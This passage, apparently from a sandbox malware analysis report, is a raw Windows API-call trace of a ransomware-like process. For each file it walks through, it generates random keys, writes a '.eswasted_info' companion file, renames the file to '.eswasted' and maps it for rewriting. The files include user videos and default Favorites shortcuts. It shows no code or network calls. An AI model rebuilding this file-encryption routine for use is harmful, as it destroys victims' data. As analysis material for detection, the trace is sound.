dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.696] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.697] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0081.697] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.697] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.698] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.698] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.706] SetEndOfFile (hFile=0x130) returned 1 [0081.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.708] CloseHandle (hObject=0x130) returned 1 [0081.710] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.710] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.711] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.711] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SeIM2zH.mkv") returned 52 [0081.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x71ec18 [0081.711] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.712] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.712] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.712] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SeIM2zH.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\seim2zh.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.713] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.714] SetEndOfFile (hFile=0x130) returned 1 [0081.714] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.714] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SeIM2zH.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\seim2zh.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SeIM2zH.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\seim2zh.mkv.eswasted")) returned 1 [0081.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\SeIM2zH.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\seim2zh.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.715] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.733] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.734] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.734] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.734] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.735] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.735] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.743] SetEndOfFile (hFile=0x130) returned 1 [0081.745] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.745] CloseHandle (hObject=0x130) returned 1 [0081.747] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.747] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.748] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.748] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.748] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0081.748] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x71ec18 [0081.748] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.748] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.748] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.749] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.749] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.749] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.750] SetEndOfFile (hFile=0x130) returned 1 [0081.751] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.751] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.751] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.eswasted")) returned 1 [0081.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.752] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.752] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.753] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.753] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.753] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.754] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.754] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.762] SetEndOfFile (hFile=0x130) returned 1 [0081.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.764] CloseHandle (hObject=0x130) returned 1 [0081.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.766] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.767] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.767] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.767] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0081.767] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x292) returned 0x71ec18 [0081.767] lstrcpyW (in: lpString1=0x71eca0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.767] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.767] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.768] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.768] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.769] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.770] SetEndOfFile (hFile=0x130) returned 1 [0081.770] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.770] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.770] lstrcpyW (in: lpString1=0x71eca0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.eswasted")) returned 1 [0081.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.772] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.772] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.773] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.773] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.773] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.774] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.774] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.782] SetEndOfFile (hFile=0x130) returned 1 [0081.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.785] CloseHandle (hObject=0x130) returned 1 [0081.786] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.786] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.787] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.787] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.787] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0081.787] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x71ec18 [0081.787] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.787] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.787] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.788] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.788] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.788] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.789] SetEndOfFile (hFile=0x130) returned 1 [0081.789] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.790] lstrcpyW (in: lpString1=0x71ecb4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted")) returned 1 [0081.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.791] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.791] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.792] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.792] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.792] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.793] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.793] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.801] SetEndOfFile (hFile=0x130) returned 1 [0081.803] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.804] CloseHandle (hObject=0x130) returned 1 [0081.805] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.805] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.806] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.806] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.806] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0081.806] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x71ec18 [0081.806] lstrcpyW (in: lpString1=0x71eca6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.806] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.806] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.807] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.807] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.808] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.809] SetEndOfFile (hFile=0x130) returned 1 [0081.809] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.809] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.809] lstrcpyW (in: lpString1=0x71eca6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.eswasted")) returned 1 [0081.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0081.811] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.811] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.812] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.812] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.812] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.813] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.813] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.821] SetEndOfFile (hFile=0x130) returned 1 [0081.823] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.823] CloseHandle (hObject=0x130) returned 1 [0081.825] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0081.825] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0081.826] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0081.826] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.826] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0081.826] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x71ec18 [0081.826] lstrcpyW (in: lpString1=0x71eca6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.826] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0081.826] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0081.827] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0081.827] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.827] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.828] SetEndOfFile (hFile=0x130) returned 1 [0081.828] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.829] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0081.829] lstrcpyW (in: lpString1=0x71eca6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.829] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.eswasted")) returned 1 [0081.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0081.830] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0081.830] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0081.831] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.831] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.831] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0081.832] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0081.832] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.840] 